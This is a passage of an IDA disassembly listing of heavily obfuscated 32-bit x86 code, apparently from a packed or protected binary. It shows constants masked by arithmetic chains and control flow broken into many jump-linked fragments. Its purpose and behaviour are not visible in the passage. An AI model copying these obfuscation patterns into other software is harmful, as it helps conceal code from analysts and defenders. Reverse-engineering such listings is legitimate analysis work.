xchg ebx, [esp+8+var_8]
jmp loc_427D2F
sub_42B43F endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422436
loc_42B458: ; CODE XREF: sub_422436:loc_4295E3�j
mov ebx, [edx]
; END OF FUNCTION CHUNK FOR sub_422436
; START OF FUNCTION CHUNK FOR sub_428BBD
loc_42B45A: ; CODE XREF: sub_428BBD:loc_428234�j
test esi, ebp
jmp loc_429C60
; END OF FUNCTION CHUNK FOR sub_428BBD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428205
loc_42B461: ; CODE XREF: sub_428205:loc_4286EA�j
push 56BC1FDh
mov [esp+0], eax
mov eax, [ebp-30h]
push eax
jmp loc_427EDB
; END OF FUNCTION CHUNK FOR sub_428205
; ---------------------------------------------------------------------------
loc_42B472: ; CODE XREF: _94j21ax3:0042AD76�j
jns loc_42A997
; =============== S U B R O U T I N E =======================================
sub_42B478 proc near ; CODE XREF: sub_423FCD+4773�p
; FUNCTION CHUNK AT 00429A2A SIZE 00000005 BYTES
mov [esp+0], ecx
pop ecx
push 6685D488h
pop edx
jmp loc_429A2A
sub_42B478 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42B487 proc near ; CODE XREF: sub_421330+66B6�p
; FUNCTION CHUNK AT 00422DAC SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042B29A SIZE 00000005 BYTES
xchg eax, [esp+0]
mov eax, [esp+0]
call sub_429DCC
cmp dword ptr [ebp-0Ch], 0
jmp loc_42B29A
sub_42B487 endp
; ---------------------------------------------------------------------------
cmp esi, eax
jmp loc_42327E
; ---------------------------------------------------------------------------
loc_42B4A2: ; CODE XREF: _94j21ax3:0042487D�j
jnz loc_428D5A
jmp loc_422E67
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_91. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_107. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42972F
loc_42B4AF: ; CODE XREF: sub_42972F:loc_423934�j
mov edx, ecx
jmp loc_42660D
; END OF FUNCTION CHUNK FOR sub_42972F
; ---------------------------------------------------------------------------
loc_42B4B6: ; CODE XREF: _94j21ax3:0042BF2C�j
jg loc_42BCFD
loc_42B4BC: ; CODE XREF: _94j21ax3:00429870�j
push 0DEC393C6h
loc_42B4C1: ; CODE XREF: _94j21ax3:loc_42440A�j
call sub_421D33
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424F07
loc_42B4C7: ; CODE XREF: sub_424F07+18�j
jmp loc_429C81
; END OF FUNCTION CHUNK FOR sub_424F07
; ---------------------------------------------------------------------------
loc_42B4CC: ; CODE XREF: _94j21ax3:00423BD4�j
pop edx
xor edx, 9FCB4497h
call sub_4239A5
call sub_42574E
mov edx, 710DA469h
call sub_4239A5
call sub_42574E
jmp loc_427575
; =============== S U B R O U T I N E =======================================
sub_42B4F1 proc near ; CODE XREF: sub_423324+C8�p
; sub_4238D1:loc_42B808�j
; FUNCTION CHUNK AT 0042AB8A SIZE 0000000B BYTES
mov [esp+0], eax
pop eax
add eax, [ebp-4]
xor edx, edx
push edx
jmp loc_42AB8A
sub_42B4F1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B500 proc near ; CODE XREF: sub_424D58:loc_428C31�j
push ebp
mov ebp, esp
push ecx
call sub_422EB0
loc_42B509: ; CODE XREF: sub_4220FC+E�j
jmp nullsub_145
sub_42B500 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423614
loc_42B50E: ; CODE XREF: sub_423614-2080�j
mov [ebp-20h], eax
; END OF FUNCTION CHUNK FOR sub_423614
; START OF FUNCTION CHUNK FOR sub_421D33
loc_42B511: ; CODE XREF: sub_423614-2090�j
; sub_421D33:loc_422E3E�j ...
jb loc_426632
test byte ptr [ebp-7], 8
jz loc_42C550
push ebp
mov eax, [ebp-20h]
jmp loc_42B5EC
; END OF FUNCTION CHUNK FOR sub_421D33
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429BE2
loc_42B52A: ; CODE XREF: sub_429BE2+A�j
mov ebp, esp
call nullsub_11
mov eax, ds:dword_425BD0
call sub_423F43
mov esp, ebp
xchg eax, [esp+0]
mov ebp, eax
pop eax
jmp loc_427541
; END OF FUNCTION CHUNK FOR sub_429BE2
; ---------------------------------------------------------------------------
pop ecx
jmp sub_426CF4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B314
loc_42B54E: ; CODE XREF: sub_42B314-75C6�j
test esi, 0D8150C45h
jmp loc_429750
; END OF FUNCTION CHUNK FOR sub_42B314
; ---------------------------------------------------------------------------
shr ecx, 1
jmp loc_42BDD5
; ---------------------------------------------------------------------------
loc_42B560: ; CODE XREF: _94j21ax3:00429093�j
cmp ebp, 164B0084h
jmp loc_42A7F6
; ---------------------------------------------------------------------------
push edx
push 9F3FA7B5h
shr edx, 1Fh
jmp loc_429DF9
; ---------------------------------------------------------------------------
popf
jmp loc_421F26
; ---------------------------------------------------------------------------
loc_42B57F: ; CODE XREF: _94j21ax3:loc_427711�j
jns loc_4271F4
and ebp, 1589BD3Eh
pushf
jmp loc_427AD4
; ---------------------------------------------------------------------------
sub ebx, 0CA108DDBh
jmp sub_42C364
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424839
loc_42B59C: ; CODE XREF: sub_424839-2A0C�j
push offset sub_42B9CF
jmp loc_42B5F7
; END OF FUNCTION CHUNK FOR sub_424839
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4272E9
loc_42B5A6: ; CODE XREF: sub_4272E9-2119�j
jnz loc_425144
jmp loc_4273DC
; END OF FUNCTION CHUNK FOR sub_4272E9
; ---------------------------------------------------------------------------
sub ebx, 0FB09B585h
jmp sub_427D65
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42851E
loc_42B5BC: ; CODE XREF: sub_42851E:loc_42434A�j
call sub_4239A5
push eax
ror eax, 5
push edi
jmp loc_42B82F
; END OF FUNCTION CHUNK FOR sub_42851E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_42B5CB: ; CODE XREF: sub_423324:loc_42BABD�j
push eax
push 1CB6F3B2h
pop eax
sub eax, 7D4ABC2Fh
or eax, 0B3C10C15h
xor eax, 0BFED3F97h
xchg eax, [esp+38h+var_38]
jmp loc_4243F2
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421D33
loc_42B5EC: ; CODE XREF: sub_421D33+97F2�j
call sub_422790
pop ecx
call sub_426626
loc_42B5F7: ; CODE XREF: sub_424839+6D68�j
jmp locret_42A521
; END OF FUNCTION CHUNK FOR sub_421D33
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426DA4
loc_42B5FC: ; CODE XREF: sub_426DA4-38FD�j
jmp loc_424716
; END OF FUNCTION CHUNK FOR sub_426DA4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_42B601: ; CODE XREF: sub_42284F:loc_4219A0�j
test edx, eax
jmp loc_422882
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4246B9
loc_42B608: ; CODE XREF: sub_4246B9+10�j
lea eax, loc_423AB6
mov [ecx+0B8h], eax
pop ecx
xor eax, eax
jmp loc_4219B0
; END OF FUNCTION CHUNK FOR sub_4246B9
; ---------------------------------------------------------------------------
loc_42B61C: ; CODE XREF: _94j21ax3:loc_42110A�j
rol edi, 1
add edi, 1B926636h
mov [edi], eax
xchg ebp, [esp]
mov edi, ebp
jmp loc_424721
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424D8C
loc_42B630: ; CODE XREF: sub_424D8C:loc_423189�j
add edi, 0DF0461ADh
xchg edi, [esp+18h+var_18]
push 0
push 0
call sub_4210C7
; END OF FUNCTION CHUNK FOR sub_424D8C
; START OF FUNCTION CHUNK FOR sub_42651A
loc_42B642: ; CODE XREF: sub_42651A+5233�j
jmp loc_4296AA
; END OF FUNCTION CHUNK FOR sub_42651A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42169F
loc_42B647: ; CODE XREF: sub_42169F:loc_42910E�j
pop eax
and eax, 0D6E572E5h
rol eax, 1Eh
add eax, 0AC41680Dh
xchg eax, [esp-10h+arg_C]
jmp loc_423674
; END OF FUNCTION CHUNK FOR sub_42169F
; =============== S U B R O U T I N E =======================================
sub_42B65F proc near ; CODE XREF: sub_422973+47A1�j
push ebp
sub_42B65F endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_422973
loc_42B660: ; CODE XREF: sub_422973:loc_426431�j
push edx
push 0D400411h
pop edx
jmp loc_429C16
; END OF FUNCTION CHUNK FOR sub_422973
; ---------------------------------------------------------------------------
loc_42B66C: ; CODE XREF: _94j21ax3:0042224D�j
push ebx
push 0DCE20AC0h
and ebx, 364597A3h
jmp loc_4295A6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F6D
loc_42B67D: ; CODE XREF: sub_428F6D:loc_428F7C�j
sub ecx, 87EE264h
shl edx, 1
or edx, ecx
pop ebx
pop eax
pop ecx
jmp loc_4242D3
; END OF FUNCTION CHUNK FOR sub_428F6D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AE5A
loc_42B68F: ; CODE XREF: sub_42AE5A�j
xor ebx, edx
shl eax, 4
jmp loc_428FE7
; END OF FUNCTION CHUNK FOR sub_42AE5A
; ---------------------------------------------------------------------------
loc_42B699: ; DATA XREF: _94j21ax3:0042184F�o
push edx
push ecx
push eax
push offset sub_42763B
jmp loc_421FBA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421F28
loc_42B6A6: ; CODE XREF: sub_421F28:loc_424BB9�j
add ecx, 0E30D9A4Bh
mov [ecx], eax
pop ecx
cmp ds:dword_422274, 0
jnz loc_4244DB
call sub_429EBD
loc_42B6C1: ; CODE XREF: sub_427ABD+403B�j
sub edx, 1DCD8D36h
jnz loc_421100
jmp loc_423EB6
; END OF FUNCTION CHUNK FOR sub_421F28
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A0CC
loc_42B6D2: ; CODE XREF: sub_42A0CC-5658�j
adc ebx, 0EF7B7E32h
mov esi, [ebx]
jmp loc_42859D
; END OF FUNCTION CHUNK FOR sub_42A0CC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427ABD
loc_42B6DF: ; CODE XREF: sub_427ABD:loc_42A06C�j
call sub_428F65
test al, al
jz nullsub_149
jmp loc_42760E
; END OF FUNCTION CHUNK FOR sub_427ABD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423284
loc_42B6F1: ; CODE XREF: sub_423284:loc_42B06F�j
cmp dword ptr [ebp-8], 0
jnz loc_4239DF
mov eax, [ebp-4]
mov [ebp-8], eax
jmp loc_4239DF
; END OF FUNCTION CHUNK FOR sub_423284
; =============== S U B R O U T I N E =======================================
sub_42B706 proc near ; CODE XREF: sub_423284:loc_4224EA�j
; FUNCTION CHUNK AT 004239D3 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0042A1B0 SIZE 00000005 BYTES
add esp, 0FFFFFFF4h
mov [ebp-8], edx
mov [ebp-4], eax
cmp dword ptr [ebp-8], 0
jmp loc_42A1B0
sub_42B706 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_159. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42B719: ; CODE XREF: _94j21ax3:004240F4�j
mov edi, 75649529h
; =============== S U B R O U T I N E =======================================
sub_42B71E proc near ; CODE XREF: _94j21ax3:00429828�p
; FUNCTION CHUNK AT 00421C43 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00428F17 SIZE 00000010 BYTES
mov [esp+0], eax
pop eax
call dword ptr [ebp-4]
test eax, eax
jz loc_426C46
mov eax, [ebp-0Ch]
neg eax
jmp loc_421C43
sub_42B71E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42651A
loc_42B737: ; CODE XREF: sub_42651A:loc_42653D�j
push eax
push 6FD50B29h
pop eax
xor eax, 128B35DBh
add eax, 82A1C10Eh
xchg eax, [esp+8+var_8]
jmp loc_42B642
; END OF FUNCTION CHUNK FOR sub_42651A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42454E
loc_42B752: ; CODE XREF: sub_42454E+D62�j
ror edi, 0Eh
loc_42B755: ; CODE XREF: sub_42454E:loc_42441D�j
call sub_42574E
push 6FD292D6h
pop edx
add edx, 2EB20AABh
push edi
pushf
push 78475BCCh
jmp loc_4279BC
; END OF FUNCTION CHUNK FOR sub_42454E
; =============== S U B R O U T I N E =======================================
sub_42B772 proc near ; CODE XREF: _94j21ax3:00424AD2�j
; _94j21ax3:0042ACFE�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00421C6B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428BDE SIZE 00000012 BYTES
mov [esp+0], ebx
pop ebx
mov [esp-4+arg_0], ebp
mov ebp, esp
push ecx
jmp loc_421C6B
sub_42B772 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4248E7
loc_42B781: ; CODE XREF: sub_4248E7+4965�j
shr ebx, 2
jmp loc_425210
; ---------------------------------------------------------------------------
loc_42B789: ; CODE XREF: sub_4248E7:loc_4230B9�j
mov eax, ds:dword_429F74
call sub_42426B
loc_42B793: ; CODE XREF: sub_429CAE:loc_422F2E�j
jz loc_421913
jmp loc_429843
; END OF FUNCTION CHUNK FOR sub_4248E7
; ---------------------------------------------------------------------------
loc_42B79E: ; CODE XREF: _94j21ax3:loc_427AB3�j
jz loc_426A34
jmp loc_42435A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4294B3
loc_42B7A9: ; CODE XREF: sub_4294B3:loc_42958A�j
cmp dword ptr [eax], 4742444Fh
jz loc_42A566
jmp loc_429378
; END OF FUNCTION CHUNK FOR sub_4294B3
; ---------------------------------------------------------------------------
push eax
ror eax, 15h
push edx
push 7C055876h
pop edx
add edx, 843CC126h
mov [edx], eax
jmp loc_4293DB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B9CF
loc_42B7D2: ; CODE XREF: sub_42B9CF:loc_42947D�j
jz nullsub_86
jmp loc_42672B
; END OF FUNCTION CHUNK FOR sub_42B9CF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_42B7DD: ; CODE XREF: sub_42284F+66F7�j
xor eax, ebp
jmp loc_429D5D
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42169F
loc_42B7E4: ; CODE XREF: sub_42169F+38A�j
jnz loc_42668E
jmp loc_421611
; END OF FUNCTION CHUNK FOR sub_42169F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42220B
loc_42B7EF: ; CODE XREF: sub_42220B+8EF8�j
cmp ebp, 0F992E5F1h
jmp loc_427F5F
; END OF FUNCTION CHUNK FOR sub_42220B
; ---------------------------------------------------------------------------
adc ebp, 33A4D887h
jmp sub_42194B
; ---------------------------------------------------------------------------
mov esi, [ebp+0]
; START OF FUNCTION CHUNK FOR sub_4238D1
loc_42B808: ; CODE XREF: sub_4238D1:loc_42AD33�j
jmp sub_42B4F1
; END OF FUNCTION CHUNK FOR sub_4238D1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_126. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426626
loc_42B80E: ; CODE XREF: sub_426626+5653�j
jmp sub_428B8C
; END OF FUNCTION CHUNK FOR sub_426626
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421D33
loc_42B813: ; CODE XREF: sub_421D33+9BD2�j
jmp loc_424DAB
; END OF FUNCTION CHUNK FOR sub_421D33
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427CAC
loc_42B818: ; CODE XREF: sub_427CAC-3B42�j
jmp loc_42A533
; END OF FUNCTION CHUNK FOR sub_427CAC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423517
loc_42B81D: ; CODE XREF: sub_423517+7�j
jmp loc_42BCD4
; END OF FUNCTION CHUNK FOR sub_423517
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423614
loc_42B822: ; CODE XREF: sub_423614:loc_428BAC�j
mov [esi], eax
pop esi
retn
; END OF FUNCTION CHUNK FOR sub_423614
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42265F
loc_42B826: ; CODE XREF: sub_421822+6�j
; sub_42265F-4F5�j
rol eax, 10h
jmp loc_42317F
; END OF FUNCTION CHUNK FOR sub_42265F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_122. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42851E
loc_42B82F: ; CODE XREF: sub_42851E+30A8�j
jmp loc_429E83
; END OF FUNCTION CHUNK FOR sub_42851E
; ---------------------------------------------------------------------------
loc_42B834: ; CODE XREF: _94j21ax3:004288BA�j
jmp loc_42A2C8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_128. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_42B83A proc near ; CODE XREF: sub_421D33+1DE�p
; sub_4294B3-52F6�p ...
jz sub_42315D
push ebp
mov ebp, esp
jmp loc_42331F
sub_42B83A endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B856
loc_42B848: ; CODE XREF: sub_42B856-8AB9�j
mov ebp, ecx
pop ecx
mov eax, ds:dword_429F80
call sub_42A277
; END OF FUNCTION CHUNK FOR sub_42B856
; =============== S U B R O U T I N E =======================================
sub_42B856 proc near ; CODE XREF: sub_42B405:loc_42375D�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00421C9E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00422B44 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00422D97 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00424950 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424986 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00425540 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00427C6A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428C6A SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00428CF9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042ACD9 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0042B848 SIZE 0000000E BYTES
xchg esi, [esp+0]
pop esi
shl eax, cl
mov edx, [ebp-18h]
shr edx, 3
mov ecx, ds:dword_429F74
movzx edx, byte ptr [ecx+edx]
and eax, edx
jmp loc_424986
sub_42B856 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_190. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42878A
loc_42B874: ; CODE XREF: sub_42878A-1A6F�j
jmp nullsub_217
; END OF FUNCTION CHUNK FOR sub_42878A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421A4F
loc_42B879: ; CODE XREF: sub_421A4F+49D6�j
jmp nullsub_152
; END OF FUNCTION CHUNK FOR sub_421A4F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A0CC
loc_42B87E: ; CODE XREF: sub_42A0CC-3333�j
add ebx, ebp
jmp loc_421618
; END OF FUNCTION CHUNK FOR sub_42A0CC
; ---------------------------------------------------------------------------
xchg esi, [edi]
jmp loc_42A83C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424EB4
loc_42B88C: ; CODE XREF: sub_424EB4+520F�j
call nullsub_8
loc_42B891: ; CODE XREF: sub_427D15-64F�j
; _94j21ax3:0042B3B1�j
mov eax, ds:dword_426F44
mov [ebp-4], eax
mov eax, (offset loc_426F36+2)
call sub_425127
mov eax, [ebp-4]
jmp loc_425119
; END OF FUNCTION CHUNK FOR sub_424EB4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421822
loc_42B8AB: ; CODE XREF: sub_421822+C�j
jz loc_423ED8
jmp loc_427F34
; END OF FUNCTION CHUNK FOR sub_421822
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_59. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421ABD
loc_42B8B7: ; CODE XREF: sub_421ABD+76FA�j
jmp nullsub_153
; END OF FUNCTION CHUNK FOR sub_421ABD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_81. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42B8BD: ; CODE XREF: _94j21ax3:004283A3�j
jmp loc_42A314
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_42B8C2: ; CODE XREF: sub_423324:loc_421A79�j
inc dword ptr [ebp-8]
; END OF FUNCTION CHUNK FOR sub_423324
; START OF FUNCTION CHUNK FOR sub_425157
loc_42B8C5: ; CODE XREF: sub_425157:loc_4275CB�j
; sub_428B74:loc_428B82�j
mov eax, [ebp+var_8]
pop ecx
pop ecx
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_425157
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42651A
loc_42B8CC: ; CODE XREF: sub_42651A+B�j
jmp nullsub_154
; END OF FUNCTION CHUNK FOR sub_42651A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424E34
loc_42B8D1: ; CODE XREF: sub_424E34+10�j
jmp loc_427C40
; END OF FUNCTION CHUNK FOR sub_424E34
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422790
loc_42B8D6: ; CODE XREF: sub_422790-E06�j
mov eax, [ebp+arg_0]
jmp loc_428FE2
; END OF FUNCTION CHUNK FOR sub_422790
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425819
loc_42B8DE: ; CODE XREF: sub_425819+140F�j
xor ecx, 6CA96BAFh
cmp ebx, ecx
pop ecx
sub eax, 95B6D5DDh
jmp loc_427095
; END OF FUNCTION CHUNK FOR sub_425819
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421D33
loc_42B8F2: ; CODE XREF: sub_421D33+A821�j
test byte ptr [ebp-8], 8
jz loc_428FC8
push ebp
mov eax, [ebp-20h]
call sub_424DB4
jmp loc_42B813
; END OF FUNCTION CHUNK FOR sub_421D33
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422F0A
loc_42B90A: ; CODE XREF: sub_422F0A:loc_42C4DF�j
call sub_421EAD
push offset sub_42BAD4
jmp loc_42B06A
; END OF FUNCTION CHUNK FOR sub_422F0A
; ---------------------------------------------------------------------------
not ebx
jmp loc_42A9D6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_42B920: ; CODE XREF: sub_423324+399B�j
add eax, ebp
push esi
push 58C4423Bh
pop esi
xor esi, 19BA012Fh
add esi, 0F7D24D25h
xor esi, 8B26EC6h
add eax, esi
jmp loc_422AD0
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4221B8
loc_42B942: ; CODE XREF: sub_4221B8:loc_42AF7F�j
pop eax
sub eax, 1DAC78AEh
test eax, 8
jmp loc_429356
; END OF FUNCTION CHUNK FOR sub_4221B8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421DC4
loc_42B954: ; CODE XREF: sub_421DC4:loc_421DED�j
; _94j21ax3:004242B9�j ...
push 0D0731AADh
pop eax
and eax, 7374DB06h
push offset sub_42B384
jmp nullsub_158
; END OF FUNCTION CHUNK FOR sub_421DC4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42291D
loc_42B96A: ; CODE XREF: sub_42291D:loc_42517A�j
mov eax, [eax]
mov eax, 1
jmp loc_42290D
; END OF FUNCTION CHUNK FOR sub_42291D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_11. PRESS KEYPAD "+" TO EXPAND]
db 1Fh
dd 81FFFFF6h, 3291CBDDh, 95D58173h, 0E981D82Bh, 0FFFFEDA1h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4223EF
loc_42B98C: ; CODE XREF: sub_4223EF+D�j
mov eax, [ebp-18h]
shl eax, 2
cdq
add eax, [esp+8+var_8]
; END OF FUNCTION CHUNK FOR sub_4223EF
; START OF FUNCTION CHUNK FOR sub_42A7A6
loc_42B996: ; CODE XREF: sub_42A7A6:loc_426ECA�j
push offset sub_423C51
jmp loc_42C405
; END OF FUNCTION CHUNK FOR sub_42A7A6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42484C
loc_42B9A0: ; CODE XREF: sub_42484C-11F5�j
xchg ebx, [esp+0]
jmp sub_424D58
; END OF FUNCTION CHUNK FOR sub_42484C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_42B9A8: ; CODE XREF: sub_423324+AF�j
jz loc_4293D0
test ebp, eax
jmp loc_4293C1
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422EB0
loc_42B9B5: ; CODE XREF: sub_422EB0+25C0�j
add eax, 0B4515C05h
jmp loc_42BC7E
; ---------------------------------------------------------------------------
loc_42B9C0: ; CODE XREF: sub_422EB0:loc_4299AB�j
cmp dword ptr [ebp-4], 3
jnz loc_42BC7E
jmp loc_4218D3
; END OF FUNCTION CHUNK FOR sub_422EB0
; =============== S U B R O U T I N E =======================================
sub_42B9CF proc near ; DATA XREF: sub_424839:loc_42B59C�o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042183B SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00421CBB SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00421ED8 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004227FD SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00423632 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423972 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00423A8C SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00425878 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042672B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00426F30 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426FC9 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00427076 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00427AA5 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004281B8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00428D3D SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042945F SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042947D SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042A0DF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042A45A SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042B1EC SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042B2A9 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042B7D2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042BA4F SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042BF82 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042BFEB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C4B1 SIZE 00000005 BYTES
test al, al
jz loc_429482
jmp loc_42A0DF
sub_42B9CF endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A9E7
loc_42B9DC: ; CODE XREF: sub_42A9E7:loc_429CA9�j
push eax
call sub_423F43
retn
; END OF FUNCTION CHUNK FOR sub_42A9E7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4272E9
loc_42B9E3: ; CODE XREF: sub_4272E9-19C0�j
jmp loc_4227DC
; END OF FUNCTION CHUNK FOR sub_4272E9
; =============== S U B R O U T I N E =======================================
sub_42B9E8 proc near ; CODE XREF: sub_424775+31D4�p
; sub_422866:loc_429E97�p ...
; FUNCTION CHUNK AT 0042282D SIZE 0000000E BYTES
push eax
jmp loc_42282D
sub_42B9E8 endp
; ---------------------------------------------------------------------------
and edi, 3D03F654h
jmp sub_42B0C9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ADA2
loc_42B9F9: ; CODE XREF: sub_42ADA2-520C�j
jz loc_426ED0
jmp loc_42A6B5
; END OF FUNCTION CHUNK FOR sub_42ADA2
; ---------------------------------------------------------------------------
cdq
jmp sub_429629
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4251A2
loc_42BA0A: ; CODE XREF: sub_4251A2-244�j
and edi, 49088AE2h
xor edi, 0C4B5A743h
add edi, 4F1CAA83h
add edi, ebp
